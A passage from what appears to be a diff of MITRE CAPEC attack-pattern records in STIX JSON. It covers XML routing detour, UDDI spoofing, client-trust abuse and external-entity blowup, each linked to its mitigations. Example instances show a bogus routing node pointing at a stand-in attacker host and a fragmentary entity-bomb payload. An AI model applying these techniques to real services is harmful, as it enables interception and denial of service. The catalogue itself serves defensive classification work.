"relationship--ce247393-b0a0-45b2-ab0c-e4822c35f2fc", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5a4ac34c-6d63-45ca-a2e5-260d4d0b39f1", + "spec_version": "2.1", + 
"target_ref": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configure TLS to use secure algorithms. The current recommendation is to use ECDH, ECDSA, AES256-GCM, and SHA384 for the most security.", + "id": "course-of-action--8127fe7e-3325-43cc-950b-3de6a289cc83", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-217-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7ade11c3-680d-4f17-9cad-323b3972dc32", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8127fe7e-3325-43cc-950b-3de6a289cc83", + "spec_version": "2.1", + "target_ref": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker spoofs a UDDI, ebXML, or similar message in order to impersonate a service provider in an e-business transaction. UDDI, ebXML, and similar standards are used to identify businesses in e-business transactions. Among other things, they identify a particular participant, WSDL information for SOAP transactions, and supported communication protocols, including security protocols. By spoofing one of these messages an attacker could impersonate a legitimate business in a transaction or could manipulate the protocols used between a client and business. 
This could result in disclosure of sensitive information, loss of message integrity, or even financial fraud.", + "external_references": [ + { + "external_id": "CAPEC-218", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/218.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + } + ], + "id": "attack-pattern--e7c0cce1-203e-454d-8a9a-76fa7ca120f8", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Spoofing of UDDI/ebXML Messages", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted business's UDDI or ebXML information must be served from a location that the attacker can spoof or compromise or the attacker must be able to intercept and modify unsecured UDDI/ebXML messages in transit." + ], + "x_capec_resources_required": [ + "The attacker must be able to force the target user to accept their spoofed UDDI or ebXML message as opposed to the a message associated with a legitimate company. Depending on the follow-on for the attack, the attacker may also need to serve its own web services." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Clients should only trust UDDI, ebXML, or similar messages that are verifiably signed by a trusted party.", + "id": "course-of-action--e81399e0-9916-4bcb-8fea-d187cf0442c3", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-218-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--46bb69df-9433-4e40-8785-079dcc99916b", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e81399e0-9916-4bcb-8fea-d187cf0442c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--e7c0cce1-203e-454d-8a9a-76fa7ca120f8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker subverts an intermediate system used to process XML content and forces the intermediate to modify and/or re-route the processing of the content. XML Routing Detour Attacks are Adversary in the Middle type attacks (CAPEC-94). The attacker compromises or inserts an intermediate system in the processing of the XML message. For example, WS-Routing can be used to specify a series of nodes or intermediaries through which content is passed. If any of the intermediate nodes in this route are compromised by an attacker they could be used for a routing detour attack. 
From the compromised system the attacker is able to route the XML process to other nodes of their choice and modify the responses so that the normal chain of processing is unaware of the interception. This system can forward the message to an outside entity and hide the forwarding and processing from the legitimate processing systems by altering the header information.", + "external_references": [ + { + "external_id": "CAPEC-219", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/219.html" + }, + { + "external_id": "CWE-441", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/441.html" + }, + { + "external_id": "CWE-610", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/610.html" + }, + { + "description": "Routing Detour", + "external_id": "32", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Routing-Detour" + }, + { + "description": "XML Entity Expansion", + "external_id": "44", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XML-Entity-Expansion" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-80", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246956/Routing-Detour" + }, + { + "description": "Andre Yee, Threat Protection in a Service Oriented World, NFR Security", + "external_id": "REF-81", + "source_name": "reference_from_CAPEC", + "url": "http://www.unatekconference.com/images/pdfs/presentations/Yee.pdf" + }, + { + "description": "Pete Lindstrom, Attacking & Defending Web Services, 2002, SPiRE Security", + "external_id": "REF-65", + "source_name": "reference_from_CAPEC", + "url": "http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf" + } + ], + "id": "attack-pattern--9b939586-fbef-4343-94f0-0046124e3e7f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XML Routing Detour Attacks", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n Here is an example SOAP call from a client, example1.com, to a target, example4.com, via 2 intermediaries, example2.com and example3.com. (note: The client here is not necessarily a 'end user client' but rather the starting point of the XML transaction).\n Example SOAP message with routing information in header:\n \n http://example1.com/\n http://example4.com/router\n uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f\n http://example2.com/router \n \n ...\n \n Add an additional node (example3.com/router) to the XML path in a WS-Referral message\n http://example2.com/router\n \n http://example3.com/router\n \n Resulting in the following SOAP Header:\n \n http://example1.com/\n http://example4.com/router\n uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f\n http://example2.com/router\n http://example3.com/router\n \n ...\n \n Continuing with this example, the attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header but not access the message directly on the initiator/intermediary node that they have targeted.\n Example of WS-Referral based WS-Routing injection of the bogus node route:\n \n http://example2.com/router\n \n http://evilsite1.com/router\n \n Resulting XML Routing Detour attack:\n \n 
http://example_0.com/\n http://example_4.com/router\n uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f\n http://example2.com/router\n http://evilesite1.com/router\n http://example3.com/router\n \n ...\n \n Thus, the attacker can route the XML message to the attacker controlled node (and access to the message contents).\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using command line or an automated tool, an attacker records all instances of web services to process XML requests.

  2. Techniques
    Use automated tool to record all instances to process XML requests or find exposed WSDL.
    Use tools to crawl WSDL

Experiment

  1. Identify SOAP messages that have multiple state processing.: Inspect instance to see whether the XML processing has multiple stages or not.

  2. Techniques
    Inspect the SOAP message routing head to see whether the XML processing has multiple stages or not.

Exploit

  1. Launch an XML routing detour attack: The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message identified in the Explore phase. Thus, the attacker can route the XML message to the attacker controlled node (and access the message contents).

  2. Techniques
    The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The targeted system must have multiple stages processing of XML content." + ], + "x_capec_resources_required": [ + "The attacker must be able to insert or compromise a system into the processing path for the transaction." + ], + "x_capec_skills_required": { + "Low": "To inject a bogus node in the XML routing table" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Specify maximum number intermediate nodes for the request and require SSL connections with mutual authentication.", + "id": "course-of-action--32d253b1-9a81-4e1f-9e76-b03889c23824", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-219-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--50e9645d-eacc-4146-b4c7-2d3fccb9d553", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--32d253b1-9a81-4e1f-9e76-b03889c23824", + "spec_version": "2.1", + "target_ref": "attack-pattern--9b939586-fbef-4343-94f0-0046124e3e7f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use SSL for connections between all parties with mutual authentication.", + "id": "course-of-action--a5db9d2f-be59-4342-b37c-e5716afbb21d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-219-1", 
+ "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ad2e36bd-7078-49d5-84e3-b333131d9839", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a5db9d2f-be59-4342-b37c-e5716afbb21d", + "spec_version": "2.1", + "target_ref": "attack-pattern--9b939586-fbef-4343-94f0-0046124e3e7f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. 
There are numerous variations of this type of attack.", + "external_references": [ + { + "external_id": "CAPEC-22", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Exploiting Trust in Client", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Web applications may use JavaScript to perform client side validation, request encoding/formatting, and other security functions, which provides some usability benefits and eliminates some 
client-server round-tripping. However, the web server cannot assume that the requests it receives have been subject to those validations, because an attacker can use an alternate method for crafting the HTTP Request and submit data that contains poisoned values designed to spoof a user and/or get the web server to disclose information.", + "Web 2.0 style applications may be particularly vulnerable because they in large part rely on existing infrastructure which provides scalability without the ability to govern the clients. Attackers identify vulnerabilities that either assume the client side is responsible for some security services (without the requisite ability to ensure enforcement of these checks) and/or the lack of a hardened, default deny server configuration that allows for an attacker probing for weaknesses in unexpected ways. Client side validation, request formatting and other services may be performed, but these are strictly usability enhancements not security enhancements.", + "Many web applications use client side scripting like JavaScript to enforce authentication, authorization, session state and other variables, but at the end of day they all make requests to the server. These client side checks may provide usability and performance gains, but they lack integrity in terms of the http request. It is possible for an attacker to post variables directly to the server without using any of the client script security checks and customize the patterns to impersonate other users or probe for more information.", + "Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. 
However, if the message server does not or cannot authenticate the authorization information in the request then the server's policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb", + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0" + ], + "x_capec_prerequisites": [ + "Server software must rely on client side formatted and validated values, and not reinforce these checks on the server side." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server" + ], + "x_capec_skills_required": { + "Medium": "The attacker must have fairly detailed knowledge of the syntax and semantics of client/server communications protocols and grammars" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that client process and/or message is authenticated so that anonymous communications and/or messages are not accepted by the system.", + "id": "course-of-action--2e4bbf17-d58f-437c-921e-69938467c2d2", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef29ae67-0988-4232-84e9-43b9c15d46eb", + "modified": 
"2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e4bbf17-d58f-437c-921e-69938467c2d2", + "spec_version": "2.1", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Do not rely on client validation or encoding for security purposes.", + "id": "course-of-action--040e99bd-3494-432d-a072-6400fc8f9043", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b53a383-dcc4-4eb9-a9b9-4b7b9cfc1401", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040e99bd-3494-432d-a072-6400fc8f9043", + "spec_version": "2.1", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize digital signatures to increase authentication assurance.", + "id": "course-of-action--03a878aa-814d-4ec7-8981-4019491f098a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + 
}, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c8ac652e-3dc2-4676-8383-373e67124466", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03a878aa-814d-4ec7-8981-4019491f098a", + "spec_version": "2.1", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize two factor authentication to increase authentication assurance.", + "id": "course-of-action--4cfdedd8-f75c-4aa9-8e79-a60fe00a2f6b", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bef5f4f9-1fce-4a46-b4fb-7c23116a91fc", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4cfdedd8-f75c-4aa9-8e79-a60fe00a2f6b", + "spec_version": "2.1", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1f8b75f6-daad-4ca8-b8eb-fba33ce31e5c", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary takes advantage of weaknesses in the protocol by which a client and server are communicating to perform unexpected actions. Communication protocols are necessary to transfer messages between client and server applications. Moreover, different protocols may be used for different types of interactions.", + "external_references": [ + { + "external_id": "CAPEC-220", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/220.html" + }, + { + "external_id": "CWE-757", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/757.html" + } + ], + "id": "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Client-Server Protocol Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n For example, an authentication protocol might be used to establish the identities of the server and client while a separate messaging protocol might be used to exchange data. If there is a weakness in a protocol used by the client and server, an attacker might take advantage of this to perform various types of attacks. For example, if the attacker is able to manipulate an authentication protocol, the attacker may be able spoof other clients or servers. 
If the attacker is able to manipulate a messaging protocol, the may be able to read sensitive information or modify message contents. This attack is often made easier by the fact that many clients and servers support multiple protocols to perform similar roles. For example, a server might support several different authentication protocols in order to support a wide range of clients, including legacy clients. Some of the older protocols may have vulnerabilities that allow an attacker to manipulate client-server interactions.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--13d1d169-0023-41e2-952f-7d794844733b", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "attack-pattern--7b462c1f-e0bf-41a7-b811-2b676c103bda" + ], + "x_capec_prerequisites": [ + "The client and/or server must utilize a protocol that has a weakness allowing manipulation of the interaction." + ], + "x_capec_resources_required": [ + "The adversary must be able to identify the weakness in the utilized protocol and exploit it. This may require a sniffing tool as well as packet creation abilities. The adversary will be aided if they can force the client and/or server to utilize a specific protocol known to contain exploitable weaknesses." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. 
This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.", + "external_references": [ + { + "external_id": "CAPEC-221", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/221.html" + }, + { + "external_id": "CWE-611", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/611.html" + }, + { + "description": "XML External Entities", + "external_id": "43", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XML-External-Entities" + } + ], + "id": "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Data Serialization External Entities Blowup", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "attack-pattern--b6f5248a-346f-484f-8091-8ab84288aa81" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, the XML parser parses the attacker's XML and opens the malicious URI where the attacker controls the server and writes a massive amount of data to the response stream. In this example the malicious URI is a large file transfer.\n < !DOCTYPE bomb []>&detonate;\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find target web service: The adversary must first find a web service that takes input data in the form of a serialized language such as XML or YAML.

Experiment

  1. Host malicious file on a server: The adversary will create a web server that contains a malicious file. This file will be extremely large, so that if a web service were to try to load it, the service would most likely hang.

  2. Craft malicious data: Using the serialization language that the web service takes as input, the adversary will craft data that links to the malicious file using an external entity reference to the URL of the file.

Exploit

  1. Send serialized data containing URI: The adversary will send specially crafted serialized data to the web service. When the web service loads the input, it will attempt to download the malicious file. Depending on the amount of memory the web service has, this could either crash the service or cause it to hang, resulting in a Denial of Service attack.

", + "x_capec_prerequisites": [ + "A server that has an implementation that accepts entities containing URI values." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated by tweaking the XML parser to not resolve external entities. If external entities are needed, then implement a custom XmlResolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.", + "id": "course-of-action--f88600ce-ddcc-4bc8-a94c-55d673aaa78d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-221-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56e07d24-a92d-4fa8-813a-42ce29f65724", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f88600ce-ddcc-4bc8-a94c-55d673aaa78d", + "spec_version": "2.1", + "target_ref": "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated by tweaking the serialized data parser to not resolve external entities. 
If external entities are needed, then implement a custom resolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.", + "id": "course-of-action--1d15fec6-8b70-44d9-b58a-5c9aebb8153b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-221-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7d30d657-82b7-41fb-8963-2316f86a288e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1d15fec6-8b70-44d9-b58a-5c9aebb8153b", + "spec_version": "2.1", + "target_ref": "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In an iFrame overlay attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from seemingly completely different system.", + "external_references": [ + { + "external_id": "CAPEC-222", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/222.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Michal Zalewski, Browser Security Handbook, 2008, Google Inc.", + "external_id": "REF-84", + "source_name": "reference_from_CAPEC", + "url": "https://code.google.com/archive/p/browsersec/wikis/Main.wiki" + }, + { + "description": "M. 
